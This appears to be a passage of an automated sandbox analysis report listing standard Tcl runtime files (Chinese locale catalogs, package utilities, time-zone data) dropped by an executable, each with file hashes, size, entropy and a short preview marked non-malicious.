                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh DAYS_OF_WEEK_ABBREV [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh DAYS_OF_WEEK_FULL [list \. "\u661f\u671f\u65e5"\. "\u661f\u671f\u4e00"\. "\u661f\u671f\u4e8c"\. "\u661f\u671f\u4e09"\. "\u661f\u671f\u56db"\. "\u661f\u671f\u4e94"\. "\u661f\u671f\u516d"]. ::msgcat::mcset zh MONTHS_ABBREV [list \. "\u4e00\u6708"\. "\u4e8c\u6708"\. "\u4e09\u6708"\. "\u56db\u6708"\. "\u4e94\u6708"\. "\u516d\u6708"\. "\u4e03\u6708"\. "\u516b\u6708"\. "\u4e5d\u6708"\. "\u5341\u6708"\. "\u5341\u4e00\u6708"\. "\u5341\u4e8c\u6708"\. ""]. ::msgcat::mcset zh MONTHS_FULL [list \.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\zh_cn.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):312
                                                                                                                                                                                                                                                    Entropy (8bit):5.1281364096481665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoX5HoHJ+3vtfNrFLoHJ+3v6MY+oXa+3vYq9:4EnLzu8d5eJ+3vtNEJ+3v6L1L3vYq9
                                                                                                                                                                                                                                                    MD5:EB94B41551EAAFFA5DF4F406C7ACA3A4
                                                                                                                                                                                                                                                    SHA1:B0553108BDE43AA7ED362E2BFFAF1ABCA1567491
                                                                                                                                                                                                                                                    SHA-256:85F91CF6E316774AA5D0C1ECA85C88E591FD537165BB79929C5E6A1CA99E56C8
                                                                                                                                                                                                                                                    SHA-512:A0980A6F1AD9236647E4F18CC104999DB2C523153E8716FD0CFE57320E906DF80378A5C0CDE132F2C53F160F5304EAF34910D7D1BB5753987D74AFBC0B6F75F3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_CN DATE_FORMAT "%Y-%m-%e". ::msgcat::mcset zh_CN TIME_FORMAT "%k:%M:%S". ::msgcat::mcset zh_CN TIME_FORMAT_12 "%P%I\u65f6%M\u5206%S\u79d2". ::msgcat::mcset zh_CN DATE_TIME_FORMAT "%Y-%m-%e %k:%M:%S %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\zh_hk.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):752
                                                                                                                                                                                                                                                    Entropy (8bit):4.660158381384211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8qmDBHZLX+TyW4OU5yPgM9Lz+SC3WwLNMW3v6G3v3Ww+:4azu8qyFOw3WwLrvTv3Ww+
                                                                                                                                                                                                                                                    MD5:D8C6BFBFCE44B6A8A038BA44CB3DB550
                                                                                                                                                                                                                                                    SHA1:FBD609576E65B56EDA67FD8A1801A27B43DB5486
                                                                                                                                                                                                                                                    SHA-256:D123E0B4C2614F680808B58CCA0C140BA187494B2C8BCF8C604C7EB739C70882
                                                                                                                                                                                                                                                    SHA-512:3455145CF5C77FC847909AB1A283452D0C877158616C8AA7BDFFC141B86B2E66F9FF45C3BB6A4A9D758D2F8FFCB1FE919477C4553EFE527C0EDC912EBBCAABCD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_HK DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u4e00"\. "\u4e8c"\. "\u4e09"\. "\u56db"\. "\u4e94"\. "\u516d"]. ::msgcat::mcset zh_HK MONTHS_ABBREV [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"\. ""]. ::msgcat::mcset zh_HK DATE_FORMAT "%Y\u5e74%m\u6708%e\u65e5". ::msgcat::mcset zh_HK TIME_FORMAT_12 "%P%I:%M:%S". ::msgcat::mcset zh_HK DATE_TIME_FORMAT "%Y\u5e74%m\u6708%e\u65e5 %P%I:%M:%S %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\zh_sg.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):339
                                                                                                                                                                                                                                                    Entropy (8bit):5.020358587042703
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoOpxoPpSocvNLohX3v6ZhLoh+3v6fJ:4EnLzu8WvNo3v6b3vu
                                                                                                                                                                                                                                                    MD5:E0BC93B8F050D6D80B8173FF4FA4D7B7
                                                                                                                                                                                                                                                    SHA1:231FF1B6F859D0261F15D2422DF09E756CE50CCB
                                                                                                                                                                                                                                                    SHA-256:2683517766AF9DA0D87B7A862DE9ADEA82D9A1454FC773A9E3C1A6D92ABA947A
                                                                                                                                                                                                                                                    SHA-512:8BA6EAC5F71167B83A58B47123ACF7939C348FE2A0CA2F092FE9F60C0CCFB901ADA0E8F2101C282C39BAE86C918390985731A8F66E481F8074732C37CD50727F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_SG AM "\u4e0a\u5348". ::msgcat::mcset zh_SG PM "\u4e2d\u5348". ::msgcat::mcset zh_SG DATE_FORMAT "%d %B %Y". ::msgcat::mcset zh_SG TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_SG DATE_TIME_FORMAT "%d %B %Y %P %I:%M:%S %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\msgs\zh_tw.msg

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                                    Entropy (8bit):5.08314435797197
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoAykaRULH/XRxvBoAyjZRULH5oAyU/G0OZoAyxW3v6ZhLoAR:4EnLzu8I5xEOKRWW3v6w3v8AC
                                                                                                                                                                                                                                                    MD5:9CD17E7F28186E0E71932CC241D1CBB1
                                                                                                                                                                                                                                                    SHA1:AF1EE536AABB8198BA88D3474ED49F76A37E89FF
                                                                                                                                                                                                                                                    SHA-256:D582406C51A3DB1EADF6507C50A1F85740FDA7DA8E27FC1438FEB6242900CB12
                                                                                                                                                                                                                                                    SHA-512:4712DD6A27A09EA339615FC3D17BC8E4CD64FF12B2B8012E01FD4D3E7789263899FA05EDDB77044DC7B7D32B3DC55A52B8320D93499DF9A6799A8E4D07174525
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset zh_TW BCE "\u6c11\u570b\u524d". ::msgcat::mcset zh_TW CE "\u6c11\u570b". ::msgcat::mcset zh_TW DATE_FORMAT "%Y/%m/%e". ::msgcat::mcset zh_TW TIME_FORMAT_12 "%P %I:%M:%S". ::msgcat::mcset zh_TW DATE_TIME_FORMAT "%Y/%m/%e %P %I:%M:%S %z".}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\opt0.4\optparse.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32944
                                                                                                                                                                                                                                                    Entropy (8bit):4.566500533811999
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:UcgIWNogzfwKFJ7glWLhTBh3agIQpojk8Cmy8A2Q:mIG1jM8hqgIfQlmy8/Q
                                                                                                                                                                                                                                                    MD5:4BF0D2DB3BEFD60D03845D413FA09184
                                                                                                                                                                                                                                                    SHA1:22389776C25FB3260EE205ADCC084764CFF2D246
                                                                                                                                                                                                                                                    SHA-256:217074E45FC877CEDDB0EB10FCA94FCF43DC235DD8DC4BD1C9B6EC3121AE726C
                                                                                                                                                                                                                                                    SHA-512:EB8E1619B868B18084F99733294B727C5B485AFC020A70EE0530D1AB6646C5265F88B8970314566353812E5E87111BFF2E328832C3755679F8884CB1603E18A1
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# optparse.tcl --.#.# (private) Option parsing package.# Primarily used internally by the safe:: code..#.#.WARNING: This code will go away in a future release.#.of Tcl. It is NOT supported and you should not rely.#.on it. If your code does rely on this package you.#.may directly incorporate this code into your application...package require Tcl 8.2.# When this version number changes, update the pkgIndex.tcl file.# and the install directory in the Makefiles..package provide opt 0.4.5..namespace eval ::tcl {.. # Exported APIs. namespace export OptKeyRegister OptKeyDelete OptKeyError OptKeyParse \. OptProc OptProcArgGiven OptParse \.. Lempty Lget \. Lassign Lvarpop Lvarpop1 Lvarset Lvarincr \. SetMax SetMin...################# Example of use / 'user documentation' ###################.. proc OptCreateTestProc {} {...# Defines ::tcl::OptParseTest as a test proc with parsed arguments..# (can't be defined before the code below is

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\opt0.4\pkgIndex.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):607
                                                                                                                                                                                                                                                    Entropy (8bit):4.652658850873767
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:jHxJRuMopS42wyGlTajUA43KXks4L1GbyvXJQ+pBbX:bvRmS42wyGlTah9XkbL7XJBB
                                                                                                                                                                                                                                                    MD5:F46D9D88D3CC6634963091B3BDC07610
                                                                                                                                                                                                                                                    SHA1:67D9FEFB7A5881A84E8021F948747826550C8DAC
                                                                                                                                                                                                                                                    SHA-256:A088E549D18ADE683273E31C004DAA7E614642FE801AFB3861EB85445250186B
                                                                                                                                                                                                                                                    SHA-512:BD216B84C029CB851A7C6476CB14F3508D963AB9680546F50BB3C542B713164EC0BBC2FB85F63613245184D09935964D9025E35802D2EF1600053A7F7F0A031C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl package index file, version 1.1.# This file is generated by the "pkg_mkIndex -direct" command.# and sourced either when an application starts up or.# by a "package unknown" script. It invokes the.# "package ifneeded" command to set up package-related.# information so that packages will be loaded automatically.# in response to "package require" commands. When this.# script is sourced, the variable $dir must contain the.# full path name of this file's directory...if {![package vsatisfies [package provide Tcl] 8.2]} {return}.package ifneeded opt 0.4.5 [list source [file join $dir optparse.tcl]].

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\package.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):23329
                                                                                                                                                                                                                                                    Entropy (8bit):4.8430523159994205
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:x2QmduMPBx2aSzv6yMiowFex3YfwTfBcDVL/xuIBCDVL3xvyYY0:x2QmMaBDqv6bFwcofKfB+FpNBAF3xbY0
                                                                                                                                                                                                                                                    MD5:188816EEE800FB29E25E1265EAE8A612
                                                                                                                                                                                                                                                    SHA1:87F7CDE689E412AC27B920620885D27F4F13EB94
                                                                                                                                                                                                                                                    SHA-256:BE3DF25F0CF653C20B69784AEE0FD719634D5421746B5B1141BC0592A59841C9
                                                                                                                                                                                                                                                    SHA-512:8E34A753052D43CFE8D26AEF61D3B549FAC06A7B21A6A9852D9D91BB5E92E470FFEEAB81DA44DD173377F146550A6A3F07CFDDC5A00FB1E17A374980C0C58E04
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# package.tcl --.#.# utility procs formerly in init.tcl which can be loaded on demand.# for package management..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994-1998 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..namespace eval tcl::Pkg {}..# ::tcl::Pkg::CompareExtension --.#.# Used internally by pkg_mkIndex to compare the extension of a file to.# a given extension. On Windows, it uses a case-insensitive comparison.# because the file system can be file insensitive..#.# Arguments:.# fileName.name of a file whose extension is compared.# ext..(optional) The extension to compare against; you must.#..provide the starting dot..#..Defaults to [info sharedlibextension].#.# Results:.# Returns 1 if the extension matches, 0 otherwise..proc tcl::Pkg::CompareExtension { fileName {ext {}} } {. global tcl_platform. if {$ext eq ""} {se

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\parray.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):816
                                                                                                                                                                                                                                                    Entropy (8bit):4.833285375693491
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:TcS2n1RBbgZKaNHaeYFSxYmXqt9IGUafZwXgEImK7k35IpbdELS8/McjbPgnE:TcHn5sZKGkwa/JxfJmRGNc93j7CE
                                                                                                                                                                                                                                                    MD5:FCDAF75995F2CCE0A5D5943E9585590D
                                                                                                                                                                                                                                                    SHA1:A0B1BD4E68DCE1768D3C5E0D3C7B31E28021D3BA
                                                                                                                                                                                                                                                    SHA-256:EBE5A2B4CBBCD7FD3F7A6F76D68D7856301DB01B350C040942A7B806A46E0014
                                                                                                                                                                                                                                                    SHA-512:A632D0169EE3B6E6B7EF73F5FBA4B7897F9491BDB389D78165E297252424546EFB43895D3DD530864B9FCF2ECF5BCE7DA8E55BA5B4F20E23E1E45ADDAF941C11
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# parray:.# Print the contents of a global array on stdout..#.# Copyright (c) 1991-1993 The Regents of the University of California..# Copyright (c) 1994 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..proc parray {a {pattern *}} {. upvar 1 $a array. if {![array exists array]} {..return -code error "\"$a\" isn't an array". }. set maxl 0. set names [lsort [array names array $pattern]]. foreach name $names {..if {[string length $name] > $maxl} {.. set maxl [string length $name]..}. }. set maxl [expr {$maxl + [string length $a] + 2}]. foreach name $names {..set nameString [format %s(%s) $a $name]..puts stdout [format "%-*s = %s" $maxl $nameString $array($name)]. }.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\safe.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:Tcl script, ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):33155
                                                                                                                                                                                                                                                    Entropy (8bit):4.751913624674884
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:OovFcXhzYqZ1//L2JXYO77xvnthi10QEnoIHd2/MFGQjmRCzY3ZKIYkA:OovFc6qZF2JXYO7prC0VnoIHokFG7Czz
                                                                                                                                                                                                                                                    MD5:1005275AC7D1789ADCA0EBAE810938D0
                                                                                                                                                                                                                                                    SHA1:6833A580EE06A6D1C26D48B3B9C1A7DF21E54B67
                                                                                                                                                                                                                                                    SHA-256:953BC6CBF03A7FF492DE59828C6D31A12D80B45873D85C03CB62A6099FED976C
                                                                                                                                                                                                                                                    SHA-512:40B37A2D4CBBA5D39D021CD7F74A5B6EAE6BDCB5A67CEC37A33EE179A006889DC28410D50075B49B2EDF898A30651C1DDC9898111E8ACA88F6B4B3D1D97276FB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# safe.tcl --.#.# This file provide a safe loading/sourcing mechanism for safe interpreters..# It implements a virtual path mecanism to hide the real pathnames from the.# slave. It runs in a master interpreter and sets up data structure and.# aliases that will be invoked when used from a slave interpreter..#.# See the safe.n man page for details..#.# Copyright (c) 1996-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution of.# this file, and for a DISCLAIMER OF ALL WARRANTIES...#.# The implementation is based on namespaces. These naming conventions are.# followed:.# Private procs starts with uppercase..# Public procs are exported and starts with lowercase.#..# Needed utilities package.package require opt 0.4.1..# Create the safe namespace.namespace eval ::safe {. # Exported API:. namespace export interpCreate interpInit interpConfigure interpDelete \..interpAddToAccessPath interpFindInAccessPath setLogCmd.}..# Helper function to

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tclIndex

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6379
                                                                                                                                                                                                                                                    Entropy (8bit):4.688241504356218
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:edtEACkiwM3g4ePOiD15Q0AkU6PkrBkGUjZKspDzmK5SMFT3ssAilsMW03abjyRQ:edtEACkiwM3g4ePOiD15Q0AkU6PkrBkm
                                                                                                                                                                                                                                                    MD5:1297B6CF6B7B195F3590C69CEA7207B9
                                                                                                                                                                                                                                                    SHA1:1D25630A54DE056B7075BD04F3C934677032D5F6
                                                                                                                                                                                                                                                    SHA-256:D652AC15F4A17285F9E48BAF62A02C3DF13FA40645A3BEBE1A00695FA3793632
                                                                                                                                                                                                                                                    SHA-512:E351EBA1C68CFB2E3B894E4BA77C9482927EF354DEC785924529CC3AC5272630A944D09975B87055FDB76B2C4228A9CF2BE50FECC54975E61F06D9F28D3EB540
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# Tcl autoload index file, version 2.0.# This file is generated by the "auto_mkindex" command.# and sourced to set up indexing information for one or.# more commands. Typically each line is a command that.# sets an element in the auto_index array, where the.# element name is the name of a command and the value is.# a script that loads the command...set auto_index(auto_reset) [list source [file join $dir auto.tcl]].set auto_index(tcl_findLibrary) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex) [list source [file join $dir auto.tcl]].set auto_index(auto_mkindex_old) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::init) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::cleanup) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::mkindex) [list source [file join $dir auto.tcl]].set auto_index(::auto_mkindex_parser::hook) [list source [file join $dir auto.tcl]].set auto_index(::auto_mki

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tm.tcl

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11739
                                                                                                                                                                                                                                                    Entropy (8bit):4.696987328866101
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:oZ2gDZFpvXkM3SR1tco5h93ocy8G69hyjWDX5W6TV9TCBeZ4idLK3mQEuPPt4QV6:yxvXt3SR1r5bYcy8GahJJTV92idL4CuS
                                                                                                                                                                                                                                                    MD5:A0F391D573004CDF9BC5874D416D6684
                                                                                                                                                                                                                                                    SHA1:5BBBA028E308FF2F45DA7F027C730A3786929172
                                                                                                                                                                                                                                                    SHA-256:5D86054B2CE7ECB7AD39A6A2EE7AFC98816A837E9819CE7B7C31C19BA0B123CF
                                                                                                                                                                                                                                                    SHA-512:2EA137BE359D80BA3BB124CE9893BC00328DED80BD7E6F30AF087D2402D42A139ED9A3BBBB5AEEFA56F624C89C8E69A8CB389B7CF82EEEC8DB678000A44F1366
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# -*- tcl -*-.#.# Searching for Tcl Modules. Defines a procedure, declares it as the.# primary command for finding packages, however also uses the former.# 'package unknown' command as a fallback..#.# Locates all possible packages in a directory via a less restricted.# glob. The targeted directory is derived from the name of the.# requested package. I.e. the TM scan will look only at directories.# which can contain the requested package. It will register all.# packages it found in the directory so that future requests have a.# higher chance of being fulfilled by the ifneeded database without.# having to come to us again..#.# We do not remember where we have been and simply rescan targeted.# directories when invoked again. The reasoning is this:.#.# - The only way we get back to the same directory is if someone is.# trying to [package require] something that wasn't there on the.# first scan..#.# Either.# 1) It is there now: If we rescan, you get it; if not you don't..#.# T

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Abidjan

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):141
                                                                                                                                                                                                                                                    Entropy (8bit):4.951583909886815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52DcsG/kXGm2OHnFvpsYvUdSalHFLd:SlSWB9X52DBGTm2OHnFvmYValHf
                                                                                                                                                                                                                                                    MD5:6FB79707FD3A183F8A3C780CA2669D27
                                                                                                                                                                                                                                                    SHA1:E703AB552B4231827ACD7872364C36C70988E4C0
                                                                                                                                                                                                                                                    SHA-256:A5DC7BFB4F569361D438C8CF13A146CC2641A1A884ACF905BB51DA28FF29A900
                                                                                                                                                                                                                                                    SHA-512:CDD3AD9AFFD246F4DFC40C1699E368FB2924E73928060B1178D298DCDB11DBD0E88BC10ED2FED265F7F7271AC5CCE14A60D65205084E9249154B8D54C2309E52
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Abidjan) {. {-9223372036854775808 -968 0 LMT}. {-1830383032 0 0 GMT}.}.

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Accra

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1416
                                                                                                                                                                                                                                                    Entropy (8bit):3.9989157635712558
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp52DUsmdHvLp/7dCjFAEubMqANKSmq3IKVun+r+Z+pU4C4Yugk:cQ9ejp/7dC2EubMqANKSm6zVWvc64Cg
                                                                                                                                                                                                                                                    MD5:603D2449143A70B7022D88AD19F13773
                                                                                                                                                                                                                                                    SHA1:5E57B03710E8DC344ED2F580BEA6A911A222F4CF
                                                                                                                                                                                                                                                    SHA-256:69797096554F2C99FFD11E402727659869BDD4E39AD5C0E900358ECCFA723791
                                                                                                                                                                                                                                                    SHA-512:11F220B07C0E75914EC1059148033324360E3A59BB08A630CF62437D7ADFA66AE08487F79D576F6E0DD4434FBE8C518A5C093D173287433E4A406439C0D38582
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:Africa/Accra) {. {-9223372036854775808 -52 0 LMT}. {-1640995148 0 0 GMT}. {-1556841600 1200 1 GHST}. {-1546388400 0 0 GMT}. {-1525305600 1200 1 GHST}. {-1514852400 0 0 GMT}. {-1493769600 1200 1 GHST}. {-1483316400 0 0 GMT}. {-1462233600 1200 1 GHST}. {-1451780400 0 0 GMT}. {-1430611200 1200 1 GHST}. {-1420158000 0 0 GMT}. {-1399075200 1200 1 GHST}. {-1388622000 0 0 GMT}. {-1367539200 1200 1 GHST}. {-1357086000 0 0 GMT}. {-1336003200 1200 1 GHST}. {-1325550000 0 0 GMT}. {-1304380800 1200 1 GHST}. {-1293927600 0 0 GMT}. {-1272844800 1200 1 GHST}. {-1262391600 0 0 GMT}. {-1241308800 1200 1 GHST}. {-1230855600 0 0 GMT}. {-1209772800 1200 1 GHST}. {-1199319600 0 0 GMT}. {-1178150400 1200 1 GHST}. {-1167697200 0 0 GMT}. {-1146614400 1200 1 GHST}. {-1136161200 0 0 GMT}. {-1115078400 1200 1 GHST}. {-1104625200 0 0 GMT}. {-1083542400 1200 1

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Addis_Ababa

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):184
                                                                                                                                                                                                                                                    Entropy (8bit):4.766991307890532
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFCZaMuUyqsVVMMvwVAIgNGExVMSt2DczqIVDcVVMMv:SlSWB9IZaM3y7VcVAIgNTxL2DnaDkr
                                                                                                                                                                                                                                                    MD5:C203A97FC500E408AC841A6A5B21E14E
                                                                                                                                                                                                                                                    SHA1:ED4C4AA578A16EB83220F37199460BFE207D2B44
                                                                                                                                                                                                                                                    SHA-256:3EBC66964609493524809AD0A730FFFF036C38D9AB3770412841F80DFFC717D5
                                                                                                                                                                                                                                                    SHA-512:2F1A4500F49AFD013BCA70089B1E24748D7E45D41F2C9D3D9AFDCC1778E750FFB020D34F622B071E80F80CC0FEFF080E8ACC1E7A8ABE8AD12C0F1A1DAA937FE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Africa/Nairobi)]} {. LoadTimeZoneFile Africa/Nairobi.}.set TZData(:Africa/Addis_Ababa) $TZData(:Africa/Nairobi).

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\tcl\tzdata\Africa\Algiers

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1041
                                                                                                                                                                                                                                                    Entropy (8bit):4.110061823095588
                                                                                                                                                                                                                                                    Encrypted:false
